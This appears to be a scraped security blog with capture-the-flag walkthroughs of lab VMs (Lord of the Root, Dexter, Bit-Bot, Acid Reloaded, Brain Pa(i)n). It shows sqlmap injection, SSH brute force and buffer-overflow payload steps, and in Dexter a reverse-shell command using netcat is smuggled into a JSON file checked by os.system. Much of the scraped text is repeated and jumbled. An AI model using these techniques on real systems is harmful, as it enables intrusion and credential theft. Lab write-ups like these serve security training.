Exploit:
import requests
gn = open('file','w')
r = requests.get('hidden_URL')
res = r.text
cook = r.cookies
cookie = r.cookies['PHPSESSID']
print cookie.strip()
page = gn.write(res)
gn.close()
gn = open('file','r')
pn = gn.readlines()
pk = pn[0].split('sub>')
gn.close()
a = int(((pk[2])[5:8]).strip(' +'))
print a
b = int(((pk[4])[11:14]).strip(']'))
print b
u_0 = int((pn[1])[16:20])
print u_0
lolo = pn[2].split('sub>')
kle = int(((lolo[1])[0:6]).strip('<'))
print kle
tabl = [u_0]
if "-" in pk[4]:
print "minus"
for i in xrange(kle):
nast = (a + tabl[i]) - (b*i)
tabl.append(nast)
if "+" in pk[4]:
print "byl plus"
for i in xrange(kle):
nast = (a + tabl[i]) + (b*i)
tabl.append(nast)
ans = tabl[kle]
print ans
answ = requests.get('hidden_URL?result='+str(ans),cookies = cook)
print answ.text
Sunday, 28 February 2016
Saturday, 13 February 2016
Lord of the root challenge
Hello,
Today I would like to present Lord of the root walkthrough :-)
Port scanning
Heh so funny :-) I examined source code and I found that the picture has assigned URL /images/iwilldoit.jpg. Perhaps we can display /robots.txt? Bingo!
Hmm a little strange, because I have got some picture. Maybe in source code will be these information which we are looking for.
You think about SQLi? Unfortunately manual payload does not work. Maybe sqlmap will be powerful in this case?
Hmmm in general nothing useful. So, I add usernames from above dump to the users.txt file and password to the pass.txt file. I executed brute force attack against SSH port and I have got
Excellent! We have limited shell :-)
Following command gives us a right way
If you don't know how to perform Buffer Overflow via command line, please look at Brain Pa(i)n challenge first.
Today I would like to present Lord of the root walkthrough :-)
Port scanning
PORT STATE SERVICE VERSIONHmm only 22 is open, so let's try connect via SSH... We have got following banner
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
[CUT]For me, it is hint - port knocking 1,2,3. Let's examine the idea.
Easy as 1,2,3
root@192.168.1.103's password:
root@osboxes:~# nmap -p- 192.168.1.103That's looks good, a little more information
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-13 11:54 GMT
Nmap scan report for 192.168.1.103
Host is up (0.0014s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 00:0C:29:75:18:08 (VMware)
PORT STATE SERVICE VERSIONBrowse
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
Heh so funny :-) I examined source code and I found that the picture has assigned URL /images/iwilldoit.jpg. Perhaps we can display /robots.txt? Bingo!
<html>Hmmm probably we should decode the string via base64 decoder.
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
root@osboxes:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -dWe are on a good way :-)
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
root@osboxes:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -dGreat!
/978345210/index.php
You think about SQLi? Unfortunately manual payload does not work. Maybe sqlmap will be powerful in this case?
available databases [4]:The Webapp database may contain credentials.
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp
[1 table]And dump
+-------+
| Users |
+-------+
Database: WebappGood! I have logged in to the application, using frodo's credrntials.
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password |
+----+----------+------------------+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+----+----------+------------------+
Hmmm in general nothing useful. So, I add usernames from above dump to the users.txt file and password to the pass.txt file. I executed brute force attack against SSH port and I have got
[22][ssh] host: 192.168.1.103 login: smeagol password: MyPreciousR00tLet's try:
Excellent! We have limited shell :-)
Following command gives us a right way
smeagol@LordOfTheRoot:/var/www/978345210$ find / -perm -4000 -type fHm, it looks interesting, ins't it? I have chosen door2 randomly
[CUT]
/SECRET/door2/file
/SECRET/door1/file
/SECRET/door3/file
[CUT]
smeagol@LordOfTheRoot:/SECRET/door2$ lsIn each doors we have the same file. We can see "setuid ELF 32-bit LSB", probably we can try with Buffer Overflow.
file
smeagol@LordOfTheRoot:/SECRET/door2$ file file
file: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped
smeagol@LordOfTheRoot:/SECRET/door2$ ./file $(python -c "print 'A'*500")So, probably I am right :)
Segmentation fault (core dumped)
If you don't know how to perform Buffer Overflow via command line, please look at Brain Pa(i)n challenge first.
Tuesday, 9 February 2016
Dexter challenge
Hi
The Panel link rediect us to web form.
SQL Injection does not work in this case :-/ Let's run DirBuster
My each ideas does not work, our sheet-anchor is some exploit in the internet
File Uploader may allow upload our reverse shell exploit.
OK, let's execute our uploaded exploit.
Excellent! We have got limited shell!
So, we are looking for an exploit, because we have pleasure with
and now
We are waiting and...
Game over!
root@osboxes:~# nmap -sn 192.168.1.0/24Enumeration services
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT
Nmap scan report for 192.168.1.105
Host is up (0.00072s latency).
MAC Address: 00:0C:29:48:F0:B7 (VMware)
root@osboxes:~# nmap -sV -A 192.168.1.105Let's browse the application
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT
Nmap scan report for 192.168.1.105
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 2b:60:6f:53:b8:c9:c8:f4:3b:0e:9b:9e:46:97:b7:55 (DSA)
| 2048 b5:9f:66:ab:f8:5d:a9:3e:51:8a:97:c3:85:10:e3:62 (RSA)
|_ 256 e7:bc:52:4f:29:0d:db:21:7e:72:76:2b:dd:ec:12:8e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 46351/udp status
|_ 100024 1 48991/tcp status
The Panel link rediect us to web form.
SQL Injection does not work in this case :-/ Let's run DirBuster
My each ideas does not work, our sheet-anchor is some exploit in the internet
Dexter (CasinoLoader) Panel - SQL InjectionHmmm this exploit looks interesting, is not it? :-) I have read the exploit and execute it:
root@osboxes:~/dexter# python 31686.py dump 192.168.1.105/Panel/gateway.phpLet;s try log in to the Panel using the credentials :-) Excellent it works!
User details: [{'password': 'if i had any real talent, i would make money legitimately', 'user': 'loserbotter'}]
Bot details: []
File Uploader may allow upload our reverse shell exploit.
OK, let's execute our uploaded exploit.
Excellent! We have got limited shell!
So, we are looking for an exploit, because we have pleasure with
www-data@dexter:/var/www$ uname -aI have not found any effective exploit for our case. I was finding some interesting files and in /var/www we have
Linux dexter 3.2.0-4-686-pae #1 SMP Debian 3.2.54-2 i686 GNU/Linux
www-data@dexter:/var/www$ lsantitamper.py and antitamper.list look interesting, isn't it? Let's check privileges these files
Panel antitamper.list antitamper.py index.html tamper.log
-rw-rw-rw- 1 root root 840 Mar 16 2014 antitamper.listHmmm, we can display content of these files
-rw-r--r-- 1 root root 278 Mar 16 2014 antitamper.py
www-data@dexter:/var/www$ cat antitamper.listProbably it is <file>:<md5(file)>
{
"/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
"/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
"/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
"/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
"/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
"/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
"/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
"/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
"/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
"/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
"/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
"/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
www-data@dexter:/var/www$ cat antitamper.pyThis script verify file integrity. For us this information isn't nice. But we can see that os.system(s) has vulnerability. My idea is: I will copy content of antitamper.list, create new file in my machine and fill in via following content
import os
import json
def check():
with open('/var/www/antitamper.list') as f:
content = json.loads(f.read())
for f in content:
s = "echo '%s %s' | md5sum -c --status >> /var/www/tamper.log" % (content[f], f)
os.system(s)
check()
{I think that, the content is obvious for you. So, we have to upload the file to our victim (in the same way like our reverse shell before).
"root":"'; nc -nv -e /bin/sh 192.168.1.103 4444 #"
"/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
"/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
"/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
"/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
"/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
"/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
"/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
"/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
"/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
"/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
"/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
"/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
www-data@dexter:/var/www$ cat /var/www/Panel/exes/antitamper.list > antitamper.listI have checked and we have updated antitamper.list file. All what we have to do is to execute antitamper.py script.
We are waiting and...
Game over!
Thursday, 4 February 2016
Bit-Bot challenge
Hi,
Bit-Bot challenge? Why not? Let's get's started!
But I clicked on the link and...
Grrrr.... So at least we know Apache version. Dirbuster again...
Ow yeah! admin.php looks great!
SQL Injection does not work on this panel :-( Let's examine source code. Unfortunately does not cotain any sensitive information. Maybe exist some exploit?
We have retrieved source code of config.php via SQL Injection
Interesting! But I didn't find fat chance to upload reverse shell. Let's try authenticate via the credentials by SSH.
Great! We have limited shell! Let's check what is bot.py from /index.php page.
Let's look, what we have in our /home directory
Game over!
Bit-Bot challenge? Why not? Let's get's started!
Nmap scan report for 192.168.1.104OK, then
Host is up (0.00068s latency).
MAC Address: 00:0C:29:F8:B4:4E (VMware)
root@osboxes:~# nmap -sV -A 192.168.1.104Nice! Let's check rpcbind
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 13:32 GMT
Nmap scan report for 192.168.1.104
Host is up (0.00075s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 e0:dc:be:e9:72:1b:c8:77:40:d2:38:2c:43:c9:b3:49 (DSA)
| 2048 88:e2:0c:77:06:bd:27:5a:14:06:58:c3:d5:41:21:f0 (RSA)
|_ 256 73:11:64:71:a6:c0:a3:f1:60:b5:cf:fa:78:42:5a:a0 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41291/udp status
|_ 100024 1 50153/tcp status
program version netid address service ownerNothing interesting :-) I hope that on port 80 will be sth useful.
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /var/run/rpcbind.sock portmapper superuser
100000 3 local /var/run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.161.75 status 102
100024 1 tcp 0.0.0.0.195.233 status 102
100024 1 udp6 ::.180.8 status 102
100024 1 tcp6 ::.187.192 status 102
But I clicked on the link and...
Grrrr.... So at least we know Apache version. Dirbuster again...
Ow yeah! admin.php looks great!
SQL Injection does not work on this panel :-( Let's examine source code. Unfortunately does not cotain any sensitive information. Maybe exist some exploit?
Bitbot C2 Panel gate2.php - Multiple VulnerabilitiesOK! From the exploit now, we know that hwid parameter in gate2.php is vulnerable to SQLi. So,
root@osboxes:~/bitbot# sqlmap -u "http://192.168.1.104/gate2.php?connection=0&hwid=1" -p hwid --level 5 --risk 3 --dbsWe are looking for some credentials...
available databases [6]:
[*] bitbot
[*] information_schema
[*] mysql
[*] performance_schema
[*] roottext
[*] test
Database: bitbotLet's try log in into BitBot with the credentials. Unfortunately it doesn't work.
Table: mining_configs
[2 entries]
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| botid | mode | pass | port | pool | proxy | params | user | threads |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| all | agr | worker password | port | poolurl | <blank> | -g yes | worker username | default |
| all | idle | worker password | port | poolurl | <blank> | -g no | worker username | default |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
We have retrieved source code of config.php via SQL Injection
<?phpWonderful! We have a lot of credentials (only two :P)! I am inside!
//Timezone
date_default_timezone_set('Europe/London'); // VISIT http://www.php.net/manual/en/timezones.php For list of timezones
//Admin Configs
$ADMIN_USER_NAME = 'botter'; //panel username
$ADMIN_PASSWORD = 'IF I CAME UP WITH UNIQUE PASSWORDS, I WOULD BE HOME BY NOW'; //panel password
//SQL Configs
$SQL_HOST = 'localhost'; //db host
$SQL_USER_NAME = 'root'; //db user
$SQL_PASSWORD = 'THIS PASSWORD WILL NOT HELP YOU'; //db pass
$SQL_DATABASE = 'bitbot'; //db name
$SQL_CONNECTION = @mysql_connect($SQL_HOST,$SQL_USER_NAME,$SQL_PASSWORD);
//Panel Configs
$BOT_PAGE_MAX = '50';
//Mining Configs
$JSONurl = ''; //follow readme
$apitoken = ''; //follow readme
$apihash = 'hashrate'; //follow readme
$crypto = 'btc'; //btc or ltc
////////////////Do Not Edit Beyond This Point///////////////////////////////////////////
$BOT_CHECKIN_INTERVAL = '60'; //seconds
$CMD_SPLIT = '<\\\\\>';
$CMD_DOWNLOAD = 'DOWN';
$CMD_UPDATE = 'UPDATE';
$CMD_VISIT_SITE = 'VISIT';
$CMD_REMOVE = 'REMOVE';
$CMD_DDOS_STOP = 'STOP';
$CMD_BTC = 'MINE';
$CMD_STOPBTC = 'STOPMINE';
?>
Interesting! But I didn't find fat chance to upload reverse shell. Let's try authenticate via the credentials by SSH.
Great! We have limited shell! Let's check what is bot.py from /index.php page.
botter@Bitbot:~$ cd /var/www/bot/We are allowed to read and write this file. Hmm I am too weak to do something useful from the file.
botter@Bitbot:/var/www/bot$ ls -la
total 12
drwxr--r-- 2 botter root 4096 Aug 21 2013 .
drwxr-xr-x 6 root root 4096 Aug 11 2013 ..
-rw-r--r-- 1 botter root 2418 Aug 11 2013 bot.py
Let's look, what we have in our /home directory
botter@Bitbot:~$ cat gen.shHm, we can read and understand bash code, Let's try
ifconfig eth0 | grep inet | grep -v inet6 | awk '{print $2substr(rand(),0,5);}' | awk '{print $0"\n"$0}' | passwd
root@osboxes:~/bitbot# python -c 'for i in range(100): print "addr:192.168.1.1040."+str(i)' > passwd.txtGreat! We are a heroes!
root@osboxes:~/bitbot# hydra -l root -P passwd.txt ssh://192.168.1.104 -f -e nsr
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-04 15:13:27
[DATA] 16 tasks, 1 server, 103 login tries (l:1/p:103), ~6 tries per task
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host: 192.168.1.104 login: root password: addr:192.168.1.1040.54
[STATUS] attack finished for 192.168.1.104 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Game over!
Wednesday, 3 February 2016
Acid reloaded challenge
Hi.
Today is time for Acid Reloaded challenge.
Oh! We can see that out target implement "Port Knocking", let's knock the ports!
We can see that our credentials are validated in /bin/includes/validation.php. We have discovered also dashboard.php file, which is a page after validation. We have to force successful validation. Let's reload our dashboard.php and we will try deceive out application that we have been successfully authenticated.
And result:
My sqlmap attemptios is fail, but I want to try harder, because maybe the application implement WAF, so
Unfortunately Avinash with NooB@123 is not a valid credential. So let's try makke and voila!
We have got
Today is time for Acid Reloaded challenge.
root@osboxes:~# nmap -sn 192.168.1.0/24
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:30 GMT
(..)
Nmap scan report for 192.168.1.102
Host is up (0.00071s latency).
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
(...)
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.67 secondsEnumeration services ...
root@osboxes:~# nmap -sV -A 192.168.1.102Hmmm... Port 22 open only? This is a little strange...
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:32 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00085s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=2/3%Time=56B1F361%P=i686-pc-linux-gnu%r(NULL,29
SF:,"SSH-2\.0-OpenSSH_6\.7p1\x20Ubuntu-5ubuntu1\.3\r\n");
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
root@osboxes:~# nmap -p- 192.168.1.102OK, let's try connect to port 22.
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:35 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00054s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
33447/tcp filtered unknown
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.54 seconds
Oh! We can see that out target implement "Port Knocking", let's knock the ports!
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 3 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:20 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00091s latency).
PORT STATE SERVICE
3/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 2 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00096s latency).
PORT STATE SERVICE
2/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 1 192.168.1.102Amazing! Port 33447 is open! Good idea, will be check what kind of service is running on 33447 port.
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00099s latency).
PORT STATE SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 33447 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
PORT STATE SERVICE
33447/tcp open unknown
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
PORT STATE SERVICE VERSIONWe areable to browse the application via our browser
33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
The default page is encouraging us to be creative :-) Let's execute dirbuster
bin directory looks interesting. We have response of http://192.168.1.102/bin request below.
As far as I know, this web form is resistant SQL Injection attack, so go deeper.
In our application /bin/dashboard.php looks promising.
Hmmm, let' go back to /bin/index.php and intercept traffic.
Let's click on "Click" link. We have been redirected to
We noticed that source code contains information that l33t_haxor.php uses id numeric parameter.http://192.168.1.105:33447/bin/l33t_haxor.php
My sqlmap attemptios is fail, but I want to try harder, because maybe the application implement WAF, so
sqlmap -u "http://192.168.1.105:33447/bin/l33t_haxor.php?id=1*%22" --dbms=mysql --threads=10 -p id --batch --tamper=space2comment,space2dash,space2hash,space2mysqlblank,space2mysqldash,space2plus,space2randomblankExcellent! Let's find some credentials (if exists)
(...)
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
available databases [4]:Tables
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login
Database: secure_loginI didn't find any interesting information from secure_login database :( But UB3R/strcpy.exe looks a little strange. Let's examine
[4 tables]
+--------------------+
| UB3R/strcpy.exe|
| login_attempts |
| members |
| word |
+--------------------+
http://192.168.1.105:33447/UB3R/strcpy.exeI have downloaded strcpy.exe file to my machine.
root@osboxes:~/Downloads# file strcpy.exeWe are happy, because
strcpy.exe: PDF document, version 1.5
This file contains only this image? I don't believe that, we should examine the file deeper
root@osboxes:~/Downloads# strings strcpy.pdfOK, at least we know that we are at right track :-)
(...)
acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
lol.jpg
(...)
root@osboxes:~/Downloads# mv strcpy.pdf strcpy.rarAnd
root@osboxes:~/Downloads# unrar e strcpy.rar
UNRAR 4.10 freeware Copyright (c) 1993-2012 Alexander Roshal
Extracting from strcpy.rar
Extracting acid.txt OK
Extracting lol.jpg OK
All OK
root@osboxes:~/Downloads# cat acid.txtMaybe lol.jpg will be helpful
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Hmmm, maybe something useful is hardcodened on the picture.
So, let's try similar technique like with our PDF file.root@osboxes:~/Downloads# strings lol.jpg
(...)
hint.txt
`You have found a contact. Now, go and grab the details :-)
root@osboxes:~/Downloads# mv lol.jpg lol.rarThe string AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= looks like somethong encoded via base64. Let's try decode
root@osboxes:~/Downloads# unrar e lol.rar
UNRAR 4.10 freeware Copyright (c) 1993-2012 Alexander Roshal
Extracting from lol.rar
Extracting Avinash.contact OK
Extracting hint.txt OK
All OK
root@osboxes:~/Downloads# cat hint.txt
You have found a contact. Now, go and grab the details :-)
root@osboxes:~/Downloads# cat Avinash.contact
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
<c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate><c:Extended><MSWABMAPI:PropTag0x3A58101F c:ContentType="binary/x-ms-wab-mapi" c:type="binary">AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=</MSWABMAPI:PropTag0x3A58101F></c:Extended>
<c:ContactIDCollection><c:ContactID c:ElementID="599ef753-f77f-4224-8700-e551bdc2bb1e"><c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e"><c:Type>SMTP</c:Type><c:Address>acid.exploit@gmail.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2"><c:FormattedName>Avinash</c:FormattedName><c:GivenName>Avinash</c:GivenName></c:Name></c:NameCollection><c:PersonCollection><c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134"><c:FormattedName>Makke</c:FormattedName><c:LabelCollection><c:Label>wab:Spouse</c:Label></c:LabelCollection></c:Person></c:PersonCollection><c:PhotoCollection><c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
root@osboxes:~/Downloads# echo "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=" | base64 -dThis command gives us something like NooB@123. This string may be a password and Avinash and Makke may be a username.
Unfortunately Avinash with NooB@123 is not a valid credential. So let's try makke and voila!
We have got
makke@acid:~$ cat .bash_historyLet's mmove our location to /bin/ and....
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint
clear
cd /bin/
ls
./overlayfs
clear
wgt
wget
apt-get remove wget
su
su -
exit
Wow, we have got root! This was not as hard as I though :-)
Tuesday, 2 February 2016
Brain Pa(i)n
Now it's time for a little Buffer Overflow.
Only trash information :-) Now turn to dirbuster (as always).
Oh! In bin directory may be some binary file?
I think that we should run our Windows 32-bit VM and download brainpan.exe on it. Probably brainpan.exe is running on our target on 9999 port.
I am pretty sure that it will be good idea when we run brainpan.exe via Immunity Debugger.
Our Windows VM has 191.168.1.101 IP address. We have to click twice on Start button.
My own fuzzer
Result:
We know that for us the Stack has three addresses EAX, EIP and ESP. We have to find where is located EIP. We verified that 900 A's cause overflow. We have overwritten via 4x"A", so
We can see, that EIP has been overwritten via 35724134
Excellent! We know where we should set up JMP ESP address and where our shellcode.
OK! We also found module without ASLR protection.
So, our payload will be as follow: "A"*524+"\xf3\x12\x17\x31"+(900-524-4)*"C".
We have to also check "bad characters", let's generate all possible hex values.
Afer sending this part of payload, we can see in our Immunity Debugger that, everything is fine. Now, we generate out shell code
Nice! We should generate new payload for our Linux target machine.
We have got limited shell!
I verified and kernel of our target is not vulnerable to known exploit :-(, but look at some interesting
Have you though about Buffer Overflow again? Executing
We can see that we haven't got any result for JMP ESP, but we have got two records for CALL EAX. OK! Then we have expectaton that validate is vulnerable to Buffer Overflow.
Excellent! We know 200 of A's cause overflow our binary!
Amazing! We can determine "where" is EIP register.
Now we can generate shell code and replace with A's. Finally we are able to use our exploit and ... BOOM!
We have changed our privileges! TRY HARDER!
Game over!
root@osboxes:~# nmap -sn 192.168.1.0/24Now enumeration services...
Nmap scan report for 192.168.1.110
Host is up (0.00039s latency).
MAC Address: 00:0C:29:10:01:C0 (VMware)
root@osboxes:~# nmap -sV 192.168.1.110Let's browse the web application
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 20:23 GMT
Nmap scan report for 192.168.1.110
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.47%I=7%D=2/1%Time=56AFBED7%P=i686-pc-linux-gnu%r(NULL,
SF:298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x2
SF:0\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20
SF:\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20\
